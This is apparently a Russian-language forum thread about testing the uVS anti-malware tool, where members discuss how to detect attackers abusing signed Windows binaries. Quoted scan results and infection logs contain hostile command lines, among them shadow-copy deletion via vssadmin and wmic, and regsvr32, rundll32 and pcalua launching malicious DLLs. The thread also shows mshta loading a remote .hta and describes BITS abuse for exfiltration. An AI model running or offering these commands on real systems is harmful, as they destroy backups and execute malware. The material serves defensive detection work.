uVS - Тестирование

[PR55.RP55 82]

При попытке повторно сканировать файл на V.T. выдаётся ошибка: HTTP Status Code: 403 ( и уже давно )

при этот просто проверка файлов работает.

----------------

Уточнение к выше написанному по SLUI.EXE

Понятно, что когда файл просто валяется в каталоге uVS его не увидит ( и это нормально )

Но когда запускаешь файл,  открывается окно, обновляешь список, а uVS файл не видит...

Проверил с другими файлами из winsxs

Файл НЕ обнаруживается при его запуске ( обновление списка )

Файл НЕ обнаруживается при повторном запуске uVS ( вне зависимости от типа запуска )

Файл Обнаруживается только при Многократном\повторном запуске.

т.е. если файл запускался 1-2 раза uVS его не видит. 100%.

После ПЯТИ ЗАПУСКОВ ПОДРЯД видит...

 

[SQx 4]

Приветствую,

Тут в очередной раз встретил интересную тему на TechNet, касаемо  политики установки приложений .Net Framework. У пользователя на Windows 8.1 при установки  приложений банк-клиента получает сообщение "ваш администратор заблокировал данное приложение, поскольку оно потенциально представляет угрозу вашему компьютеру" далее прерывается установка.

В событиях приложений видно следующее:

Description: Приложение: AlfaDirect.SigningTool.exe
Версия платформы: v4.0.30319
Описание. Процесс был завершен из-за необработанного исключения.
Сведения об исключении: System.Security.Policy.PolicyException
   в System.AppDomain.SetupApplicationHelper(System.Security.Policy.Evidence, System.Security.Policy.Evidence, System.ApplicationIdentity, System.ActivationContext, System.String[])
   в System.AppDomain.InitializeDomainSecurity(System.Security.Policy.Evidence, System.Security.Policy.Evidence, Boolean, IntPtr, Boolean)

Может стоит отслеживать эти настройки в реестре, это бы в некоторых случаях помогло с ложными оповещениями "якобы приложение является потенциально опаснойи представляет угрозу вашему компьютеру".

Что скажете?

[SQx 4]

Забыл добавить пути в реестре:

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\.NETFramework\Security\TrustManager\PromptingLevel

Подробнее: How to: Configure the ClickOnce Trust Prompt Behavior

[PR55.RP55 82]

В коде  Microsoft обнаружена ошибка, ( crypt32.dll ) которая отвечает за проверку цифровых  подписей, что потенциально позволяет  подделать подпись файла.

https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/

[PR55.RP55 82]

С выходом новой версии Хрома появились записи типа.

Полное имя                  79.0.3945.130
Имя файла                   79.0.3945.130
Тек. статус                 в автозапуске Chrome/Yandex
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске Chrome/Yandex
                            
Доп. информация             на момент обновления списка
Стартовая страница          Chrome

Образ тема:  https://forum.esetnod32.ru/messages/forum4/topic15670/message108070/?result=reply#message108070

                            

[santy 151]

demkd, приветствую.

в последнее время, злоумышленники, стремятся обойти защиту в HIPS по блокированию деструктивных действий, в частности удалению теневых копий, переносят удаление в системные задачи.

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\WBEM\WMIC.EXE
Имя файла                   WMIC.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMICDELETESHADOWSCOPY       (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ SHADOWCOPY DELETE)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     47919524C8000
Linker                      8.0
Размер                      801280 байт
Создан                      19.01.2008 в 09:13:56
Изменен                     19.01.2008 в 11:00:47
                            
TimeStamp                   19.01.2008 в 06:13:56
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            wmic.exe.mui
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    WMI Commandline Utility
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     SHADOWCOPY DELETE
SHA1                        02316B3393A8F06C0D5132937E268BB0D7044835
MD5                         E24706AFDEAF910604BBFF5D514FA3DA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\WMICRESTORE

и

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\VSSADMIN.EXE
Имя файла                   VSSADMIN.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
VSSADMINDELETESHADOWSCOPY   (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ DELETE SHADOWS /ALL /QUIET)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     479198D722000
Linker                      8.0
Размер                      127488 байт
Создан                      19.01.2008 в 09:29:43
Изменен                     19.01.2008 в 11:00:42
                            
TimeStamp                   19.01.2008 в 06:29:43
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            VSSADMIN.EXE.MUI
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    Интерфейс командной строки для Microsoft® Volume Shadow Copy Service
Продукт                     Операционная система Microsoft® Windows®
Copyright                   © Корпорация Майкрософт. Все права защищены.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE

хотелось бы,

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.
                            

                          

[PR55.RP55 82]

Цитата

Santy пишет:   для случаев, когда чистый файл используется в деструктивных целях      

https://www.anti-malware.ru/news/2018-07-16-1447/26826

 

[demkd 603]

В 28.01.2020 at 9:21 PM, santy сказал:

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk 

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.

посмотрю что там можно сделать, пока с временем проблемы.

[santy 151]

23 минут назад, demkd сказал:

посмотрю что там можно сделать, пока с временем проблемы. 

может в коде программы жестко прописать список системных файлов, через которые возможно выполнить деструктивные действия в системе: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe. И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

[PR55.RP55 82]

 

Цитата

Santy пишет:  wmic.exe, , cmd.exe, svchost.exe

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

[demkd 603]

3 часа назад, santy сказал:

И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

[santy 151]

43 минут назад, demkd сказал:

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.

[santy 151]

2 часа назад, PR55.RP55 сказал:

 

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

можно  и категорию, это непринципиально, лишь бы не было лишних хлопот с дополнительным программированием.

[santy 151]

13 часов назад, santy сказал:

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить. 

или так, например, сделать:

ввести категорирование критериев с признаком приоритета критерия над цифровой из белого списка и безопасным хэшем.

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

но это приведет к модификации справочника критериев, поскольку нужно будет добавить поле выбора категории критерия, и нужен будет дополнительно управляемый список категорий критериев, чтобы установить признак приоритета.

ну, и соответственно, это повлияет на правила отбора объектов в группу "подозрительные и вирусы".

[PR55.RP55 82]

santy

Категория: " Системные  Потенциально Деструктивные <--------- "

Можно установить заглушку: "Не проверять файлы в категории по б.с.ЭЦП;  SHA1 " (  settings.ini  )

( Задаётся любая категория. ( или группа категорий ) )

Значит проверка происходит только по базе поисковых критериев. Если критерий не задан, файл всегда отображается в своей категории.

Добавить в Инфо. : "Команда вне типовых значений - Подозрительная команда "

Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE 

т.е. после установки системы и базовых компонентов типа NET Framework; Vcredist и т.д. uVS запоминает типовые значения Инфо. и может сравнивать. ( только для основных файлов )

[PR55.RP55 82]

+

В uVS есть категория: " Неизв.модули в изв. процессах. "

А категории: " Неизв. команды в изв. процессах. "

Такой категории нет...

----------

Кроме того пора бы уже уйти от практики: " Тихо сам с собою я веду беседу"

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

Поисковые алгоритмы программы должны развиваться - а какое может быть развитие, если всё оставить как есть.

 

 

 

[santy 151]

3 часа назад, PR55.RP55 сказал:

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

а demkd это надо, разбираться с сотнями записей в списках snms? кому надо, тот спросит или найдет. Ты же публикуешь свои списки. Поделиться можно лишь действительно уникальными критериями, если получается их находить.

[PR55.RP55 82]

Сравнивал очистку в uVS и FRST

Если применить FRST ( EmptyTemp ) сразу после очистки в uVS - то программа всегда находит дополнительно 30-50 mb и PC по ощущениям начинает лучше работать. т.е. нужно в этом направлении _обязательно смотреть.

[santy 151]

В 08.02.2020 at 12:33 PM, santy сказал:

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

demkd,

можно еще автоматически карантинить подобные файлы из Prefetch, если для них сработал критерий "деструктивное действие, выполняемое системным файлом"

возможно в самом файле *.pf будет содержаться полезная для анализа информация

https://habr.com/ru/company/group-ib/blog/487516/

[PR55.RP55 82]

Santy пишет:   Пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.       

Техника LOLbins (living off the land), работает используя легитимные процессы Windows для выполнения вредоносного кода, не запуская собственные исполняемые файлы и процессы.
К примеру, по данным Microsoft, малварь регулярно злоупотребляла msiexec.exe, rundll32.exe, schtasks.exe и т.д. Используя эти процессы для запуска вредоносного кода.

regsvr32.exe

O22 - ScheduledTask: (Ready) {300E0444-6E75-00D4-8C2E-786DE3115137} - {root} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\1d479c60\119a6428.dll"
Task: C:\WINDOWS\Tasks\{B1AA8F04-0894-F922-12CF-066671D0E46D}.job => C:\WINDOWS\system32\regsvr32.exe F /s /n /i:/rt C:\DOCUME~1\ALLUSE~1\APPLIC~1\1c89c365\7520cf2e.dll <==== ATTENTION
Task: {9557A449-CB89-49B5-9552-89C8163A54C3} - System32\Tasks\{402A874D-3698-5E16-6CA4-31FE2AC06873} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c8f9210c\cf9bd03d.dll" <==== ATTENTION
O22 - Task: {77108E3C-4C71-191B-AD1B-E1D1F566BF0E} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\bdd75b60\d136dad1.dll"
HKU\S-1-5-21-926217151-4064649387-4294350901-500\...\Run: [Ajjdworks] => regsvr32.exe C:\Users\Администратор\AppData\Local\Ajjdworks\Image.DLL <==== ATTENTION
HKU\S-1-5-21-2939633801-2705330331-3998745655-1001\...\Run: [update_w32.exe] => C:\Windows\system32\regsvr32.exe /s scrrun.dll "D:\Users\Таня\AppData\Roaming\SysplanNT\msimg32.dll" htvrh666 "D:\Users\Таня\AppData\Roaming\SysplanNT\update_w32.exe" r <==== ATTENTION

rundll32.exe

Запуск в командной строке предельно прост — rundll32.exe.
Вызов имени библиотеки DLL происходит без вызова расширения .dll
При этом имя функции выглядит несоответствующим.
В реальности код зловреда запускается одновременно с загрузкой библиотеки DLL.
Бинарный код rundll32.exe, подписанный Windows, копируется в другие локации под именем ******.exe, а затем запускается с помощью той же команды, что и rundll32.exe ранее.

O22 - Task (Ready): BYkucKAbLoZInYF - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PieSfXRZU\Afbjxp.dll",#1
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\S9YGPGPPyq\kl.dll",Svc [X] <==== ATTENTION
C:\Program Files (x86)\S9YGPGPPyq\kl.dll
O4 - HKCU\..\Run: [MSIDLL] rundll32.exe msionc32.dll,bQiYtMdJrG
Task: {D70D36C3-72F5-4E28-8622-5F312E2B467B} - System32\Tasks\GAasuBHwSxk => C:\WINDOWS\system32\rundll32.exe

msiexec.exe

HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
Update Manager [20161005]-->MsiExec.exe /I{F428D0FB-765D-40EB-BDD8-A1E7F5C597FA}
globalupdate Helper []-->MsiExec.exe /I{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}

schtasks.exe

schtasks.exe /create /F /tn "123123" /xml "c:\temp\task.xml"
schtasks.exe /run /i /tn "123123"

[santy 151]

17 минут назад, PR55.RP55 сказал:

regsvr32.exe

rundll32.exe

ну, regsvr32.exe и rundll32.exe в любом случае засветятся, потому что здесь будет дополнительно отобран в списке объектов файл, который он запускают или регистрируют.

хотя, дополнительно статус "системного файла с деструктивным действием" не помешает в данном случае.

[PR55.RP55 82]

cscript.exe

https://tproger.ru/news/winrm-vbs-windows/

https://vms.drweb.com/virus/?i=8365848&lng=en

https://vms.drweb.ru/virus/?i=4154287

O22 - Task: \Microsoft\Windows\Server Manager\CleanupOldPerfLogs - C:\Windows\system32\cscript.exe /B /nologo C:\Windows\system32\calluxxprovider.vbs $(Arg0) $(Arg1) $(Arg2)

mshta.exe

mshta.exe c:\temp.hta
Mshta.exe http://www.******.com/bar.hta

[santy 151]

wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют.

---------------------------------

вот еще картинка, как могут быть применены системные файлы в деструктивных действиях.

wmic, bitsadmin:

Программа администрирования BITS (BITS) используется в Windows для загрузки обновлений безопасности. Именно это свойство службы использует киберпреступники, чтобы скрыть свое присутствие на скомпрометированной системе. Еще одна особенность, которая затрудняет предупреждение BITS, заключается в том, что когда опасное приложение загружает файлы с использованием службы, трафик, как представляется, поступает из BITS, а не из приложения.  Возможности злоупотреблений BITS не ограничиваются загрузкой программ. Служба BITS может стать источником утечки информации, если воспользоваться ею для передачи файлов из сети на внешний компьютер

[PR55.RP55 82]

Цитата

Santy пишет:  wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют       

Если файл постоянно доступен -  засветят. А если это сетевой ресурс, или внешний накопитель то...

pcalua.exe

Task: {58E521CE-9E9C-4AF4-8672-055BAB6CC610} - System32\Tasks\{71EFCB4A-AFB7-4A1A-BF03-2C4652886663} => C:\Windows\system32\pcalua.exe -a E:\AUTORUN.EXE -d E:\

Task: {39D66A93-E0D4-460F-90A5-7E254BE62565} - System32\Tasks\{5A56217C-FB4D-4CD2-A83E-6660BC431D40} => pcalua.exe -a E:\qfyh01ww.exe -d E:\

Task: {555780F2-DC30-4C70-8322-E018A752B23C} - System32\Tasks\{E1F14680-765F-4CFE-96F6-07A005324F2D} => C:\Windows\system32\pcalua.exe -a C:\Users\Пользователь\Desktop\tconp.exe -d C:\Users\Пользователь\Desktop

O22 - Task: {467E7092-19D2-4143-B5A8-953C2E358898} - C:\Windows\system32\pcalua.exe -a C:\Temp\jre-8u161-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1

[PR55.RP55 82]

Пока форум не работал по ошибкам, предложениям, замечаниям публиковал здесь:

https://forum.esetnod32.ru/forum8/topic15904/?PAGEN_1=5

------------

Цитата

Полное имя                  C:\USERS\836D~1\APPDATA\LOCAL\TEMP\WCT5E09.TMP
Имя файла                   WCT5E09.TMP
Тек. статус                    ПОДОЗРИТЕЛЬНЫЙ                                                  
Сохраненная информация      на момент создания образа
Статус                      
Инф. о файле                Системе не удается найти указанный путь.
Цифр. подпись               проверка не производилась
                            
BITS Job                    PreSignInSettingsConfigJSON
ID                          1fdd3525-e690-48f9-bcfc-5cf2cc229ea6
URL                      https://g.live.com/odclientsettings/Prod

------------
Образ в теме:  https://forum.esetnod32.ru/messages/forum6/topic16189/message110932/#message110932